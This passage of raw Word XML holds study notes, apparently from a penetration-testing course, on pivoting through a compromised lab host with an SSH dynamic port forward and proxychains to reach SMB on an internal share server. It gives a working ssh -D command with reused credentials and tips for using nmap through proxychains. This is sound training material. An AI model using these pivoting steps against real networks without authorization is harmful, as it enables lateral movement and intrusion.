      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that the packets must be properly formatted - most often by SOCK-compatible client software. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some cases, software is not SOCKS-compatible by default.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can get around this using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which wrap outbound connections in SOCKS protocol headers. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000870">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000871">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000872">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="485" name="image478.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image478.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId184"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="189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73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what we want to achieve. It's the same as the SSH local port forward except we are wrapping our packets in SOCKS format when we send it to CONFLUENCE01, and now PGDATABASE01 can send packets to any sockets (socket is a IP address and port, like 10.5.5.5:22)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal here is to be able to access port 445 (SMB) of HRSHARES, and other sockets in the INTERNAL subnet, all from our Kali!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000875">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000876">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x9cp9ylzd0oi" w:id="76"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic Port Forwarding with SSH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000877">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000878">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and try to connect to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PGDATABASE01, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to strat a SOCKS5 proxy on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000879">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="297" name="image319.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image319.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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87A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells SSH to start a SOCKS5 proxy,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which we will then connect to via Proxychains. And if we weren't using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we would have to manually configure applications to use the SOCKS proxy if they are SOCKS compatible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will create our SSH connection to PGDATABASE01 using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">database_admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials again. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In OpenSSH, a dynamic port forward is created with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. The only argument this takes is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we want to bind to. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, we want it to listen on all interfaces (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9999</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000087F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We don't have to specify a socket address to forward to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKET </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">headers will have that information</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000880">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="981"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll also pass the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag to prevent a shell from being spawned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000881">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000882">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As with the previous example, we don't receive any immediate output after we enter the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000883">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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t xml:space="preserve">As we did earlier, let's connect to port 445 on HRSHARES. However, this time we will do it through the SOCKS proxy port created by our SSH dynamic port forward command.</w:t>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t xml:space="preserve">To accomplish this, we'll want to use smbclient again. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, we find that smbclient doesn't natively provide an option to use a SOCKS proxy. Without a native option to use a SOCKS proxy in smbclient, we can't take advantage of our dynamic port forward.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The SOCKS proxy can't determine how to handle traffic that isn't encapsulated in the SOCKS protocol format.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qi46mrp99xz1" w:id="77"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains</w:t>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t xml:space="preserve">The</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX Module 27. Assembling the Pieces </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">goes into a lot depth with using proxychains, specifically with metasploit, and it shows how to use a variety of tools with proxychains!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: In order for NMAP to work with proxychains, we must specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1443"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also, you can use the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag right after typing "proxychains" for quietmode, as shown in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX Module 27. Assembling the Pieces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000088F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To use smbclient in this situation, we'll leverage </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a tool that can force network traffic from third party tools over HTTP or SOCKS proxies. As the name suggests, it can also be configured to push traffic over a chain of concurrent proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000890">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000891">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The way Proxychains works is a light hack. It uses the Linux shared object preloading technique (LD_PRELOAD) to hook libc networking functions within the binary that gets passed to it and forces all connections over the configured proxy server. This means it might not work for everything but will work for most dynamically-linked binaries that perform simple network operations. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It won't work on statically linked binaries</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000892">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000893">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try Proxychains with smbclient. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxychains uses a configuration file for almost everything</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, stored by default at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
